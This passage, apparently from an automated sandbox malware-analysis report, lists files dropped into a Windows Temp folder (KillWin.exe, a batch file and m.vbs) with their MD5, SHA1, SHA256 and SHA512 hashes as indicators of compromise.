| SHA256 | 91d5604845d13992f916f56c2301cf866973520ef647a5d7073cdddc0bca3d00 |
| SHA512 | 278aa953b1578c2b7eebcd6d4dc3241a3e8862ce1ebafb2e37ec3715f2f92833f147c41227052f8ec6f06ae35d71f810913b3c28dd1675ee5e473559b3e85bc7 |
C:\Users\Admin\AppData\Local\Temp\KillWin.exe
| MD5 | 3713a4dfdfa399b20561aa8bcbea1b25 |
| SHA1 | 8109cb8e9e9c00fba74d456c1756799c72072989 |
| SHA256 | 8e4e731640114f96219d4aa6ce2416c2f1db7e75834cdca91c380de6b0eebbaa |
| SHA512 | a34244e4622648dc19f2efa001bf461cec7794bb7050fadacd5369272d83db87fef711afbb5a108b7665304430a419ee7fdf09c2e8155f496eba1a321142b090 |
C:\Users\Admin\AppData\Local\Temp\4066_30760.bat
| MD5 | 71f2ece5d6de26f528ff0e1c9382f1c9 |
| SHA1 | 12b4fe9e4f1d4e0ea494393282baeb58f5991c8e |
| SHA256 | 648b31ac461f2539e111298e9d5f8e154ed8852a4f8c57cceec17504da8cdb01 |
| SHA512 | 0236aa82c44f9cdc7230d2b46c910c794820202e697031c893ed8502883f310bc202beee7d4a502f5508c8f6c320f9479e48be30f24f344624a0224a1f549c56 |
C:\Users\Admin\AppData\Local\Temp\m.vbs
| MD5 | cbaa7c6cb3c383b11dd691b316f2a91b |
| SHA1 | 0f2d66cea7cc24e0dda9972e05a7b236a9bcbc9e |
| SHA256 | 5f1ffcde4ee668c3350fdd9730df67adc35c704342ac2224924069c9bae2be95 |
| SHA512 | fe74a8ccd7875e7bf9588d386fd886810dc0edd01216bf5a886add985fcbb813296a606ec83028a90d30b4df348125827300a98f2ec6081a5d981d09316a44f9 |